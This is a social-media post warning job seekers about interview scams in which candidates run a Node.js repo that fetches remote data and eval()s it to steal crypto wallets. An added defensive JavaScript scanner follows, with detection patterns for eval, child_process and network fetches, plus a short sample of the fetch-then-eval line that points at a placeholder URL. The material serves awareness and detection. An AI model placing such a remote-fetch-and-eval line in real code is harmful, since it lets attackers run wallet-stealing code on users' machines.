Juri
@juri23
FYI degens (LinkedIn article) - crazy if anybody is running code outside of a dedicated container...

So apparently Code Interview scams are a thing now. Here's one we saw recently (which was thankfully caught early):

• Candidate gets invited to a Node.js interview and told "please clone this repo and run it locally, so we can ask you some questions about it."
• If you were to hunt through every line of this repo, you might not find anything suspicious. Except for one small line which fetches data from XXX (pastebin for JSON data) and runs it through `eval()`.
• What was in the npoint payload? Heavily obfuscated JavaScript code. Running it line-by-line in an interactive debugger revealed that it was scanning for crypto wallets on the candidate's device and sending the data to a remote server.
• And of course the names and email addresses of the interviewer were copied from a legitimate business, but with a ".org" domain instead of ".com".

So if you're out there applying for jobs, please stay alert.
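A defender-side check for the pattern described in the post above, as an added example that is not part of the original post or the linked article: a first-pass scan of a cloned Node.js repo, before anything is run, for files that both pull remote data and execute strings as code. The names `scanSource`, `scanRepo` and `SAMPLE`, the severity labels and the `example.invalid` URL are assumptions made for illustration, and regex matching of this kind is a triage filter, not proof that a repo is safe.

```javascript
// Added example: heuristic pre-run triage for a cloned Node.js repo.
const SINKS = [ // calls that execute a string as code or spawn processes
  ["eval", /\beval\s*\(/],
  ["new Function", /\bnew\s+Function\s*\(/],
  ["vm.run*", /\bvm\.runIn(NewContext|ThisContext|Context)\s*\(/],
  ["child_process", /require\(\s*["']child_process["']\s*\)/],
];
const FETCHES = [ // calls that pull data from the network
  ["fetch", /\bfetch\s*\(/],
  ["http(s) get/request", /\bhttps?\.(get|request)\s*\(/],
  ["http client module", /require\(\s*["'](axios|got|node-fetch)["']\s*\)/],
];

function scanSource(file, text) {
  const hits = [];
  text.split(/\r?\n/).forEach((src, i) => {
    for (const [name, re] of SINKS)
      if (re.test(src)) hits.push({ file, line: i + 1, kind: "sink", name });
    for (const [name, re] of FETCHES)
      if (re.test(src)) hits.push({ file, line: i + 1, kind: "fetch", name });
  });
  const kinds = new Set(hits.map((h) => h.kind));
  // Remote data plus a code-execution sink in one file is the pattern from the post.
  let severity = "clean";
  if (kinds.has("sink")) severity = kinds.has("fetch") ? "high" : "review";
  else if (kinds.has("fetch")) severity = "info";
  return { file, severity, hits };
}

function scanRepo(root) {
  const fs = require("fs"), path = require("path");
  const out = [];
  for (const e of fs.readdirSync(root, { withFileTypes: true })) {
    const p = path.join(root, e.name);
    if (e.isDirectory()) {
      if (e.name !== ".git") out.push(...scanRepo(p));
    } else if (/\.(cjs|mjs|js|ts)$/.test(e.name)) {
      out.push(scanSource(p, fs.readFileSync(p, "utf8")));
    }
  }
  return out.filter((r) => r.severity !== "clean");
}
// Constructed sample resembling the line the post describes (placeholder URL).
const SAMPLE = [
  'const res = await fetch("https://example.invalid/data.json");',
  "const cfg = await res.json();",
  "eval(cfg.init);",
].join("\n");
console.log(scanSource("sample.js", SAMPLE));
```

A `review` result still deserves a manual read, because the fetch and the sink can sit in different files. Run the scan from outside the cloned directory and keep the clone inside the dedicated container the post recommends.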